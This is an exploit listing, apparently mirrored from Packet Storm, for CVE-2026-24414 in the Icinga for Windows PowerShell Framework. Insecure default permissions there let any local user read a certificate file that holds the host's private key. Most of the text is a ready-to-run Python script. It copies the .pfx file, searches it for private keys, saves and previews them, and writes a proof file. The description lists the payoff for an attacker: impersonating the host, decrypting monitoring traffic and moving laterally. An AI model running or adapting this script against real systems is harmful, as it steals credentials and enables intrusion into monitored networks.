Share
## https://sploitus.com/exploit?id=PACKETSTORM:216007
# Exploit Title: Icinga for Windows 1.13.3 - Incorrect Default Permissions
    Private Key Exposure
    # Date: 2026-02-23
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://icinga.com/
    # Software Link:
    https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3
    # Version: Icinga PowerShell Framework < 1.13.4, < 1.12.4, < 1.11.2
    # Tested on: Windows 11 25H2
    # CVE: CVE-2026-24414
    
    ## Description
    Icinga for Windows PowerShell Framework versions prior to 1.13.4, 1.12.4,
    and 1.11.2 install the certificate directory with insecure default
    permissions. The directory `C:\Program
    Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate` is
    created with `BUILTIN\Users:(RX)` permissions, allowing ANY local user to
    read the `icingaforwindows.pfx` certificate file containing the private key.
    
    This vulnerability leads to complete exposure of the Icinga private key,
    enabling attackers to:
    - Impersonate the monitored host
    - Decrypt Icinga monitoring traffic
    - Use the certificate for authentication to other systems
    - Perform lateral movement within the network
    
    ## Proof of Concept
    The following Python exploit demonstrates that any standard user can read
    and extract the private key:
    
    ```python
    #!/usr/bin/env python3
    """
    CVE-2026-24414 - Icinga for Windows Private Key Exposure
    Exploit Author: nu11secur1ty
    Tested on: Windows 11 25H2
    """
    
    import os
    import re
    import shutil
    import getpass
    from pathlib import Path
    from datetime import datetime
    
    # Target path
    cert_file = Path(r"C:\Program
    Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate\icingaforwindows.pfx")
    
    def main():
        print("[*] CVE-2026-24414 Exploit - Icinga Private Key Exposure")
        print(f"[*] Running as: {getpass.getuser()}")
        print("-" * 60)
    
        # Check if target exists
        if not cert_file.exists():
            print("[-] Target certificate not found")
            return
    
        print(f"[+] Found certificate: {cert_file}")
        print(f"[+] File size: {cert_file.stat().st_size} bytes")
    
        # Check permissions (visual confirmation)
        os.system(f'icacls "{cert_file.parent}"')
    
        # Create output directory
        output_dir = Path.cwd() /
    f"icinga_exposed_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
        output_dir.mkdir(exist_ok=True)
    
        # Copy certificate
        shutil.copy2(cert_file, output_dir / "original_certificate.pfx")
        print(f"[+] Certificate copied to: {output_dir /
    'original_certificate.pfx'}")
    
        # Try to extract private key
        with open(cert_file, 'rb') as f:
            data = f.read()
    
        # Look for PEM private key
        try:
            text_data = data.decode('utf-8', errors='ignore')
            pattern = r'-----BEGIN.*PRIVATE KEY-----.*?-----END.*PRIVATE
    KEY-----'
            keys = re.findall(pattern, text_data, re.DOTALL)
    
            if keys:
                for i, key in enumerate(keys, 1):
                    key_file = output_dir / f"private_key_{i}.key"
                    with open(key_file, 'w') as kf:
                        kf.write(key)
                    print(f"[+] Private key extracted: {key_file}")
                    print(f"[+] Key preview:\n{key[:200]}...")
            else:
                print("[!] No PEM key found - certificate may be binary")
                print(f"[+] Raw certificate saved for analysis")
        except:
            print("[!] Binary certificate saved - may contain private key in
    DER format")
    
        print("\n" + "="*60)
        print("[!] VULNERABILITY CONFIRMED!")
        print("[!] ANY local user can read this private key")
        print("[!] CVE-2026-24414 - Incorrect Default Permissions")
        print("="*60)
    
        # Show dangerous permissions
        print("\n[!] CRITICAL: Check the permissions above")
        print("[!] Look for: BUILTIN\\Users:(I)(RX) - THIS IS THE
    VULNERABILITY")
    
        # Create proof file
        proof = output_dir / "PROOF.txt"
        with open(proof, 'w') as f:
            f.write(f"CVE-2026-24414 Exploit Success\n")
            f.write(f"Date: {datetime.now()}\n")
            f.write(f"User: {getpass.getuser()}\n")
            f.write(f"Certificate: {cert_file}\n")
            f.write("Private Key: EXTRACTED\n")
            f.write("Impact: ANY local user can steal this key\n")
    
        print(f"\n[+] Proof file created: {proof}")
    
    if __name__ == "__main__":
        main()
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>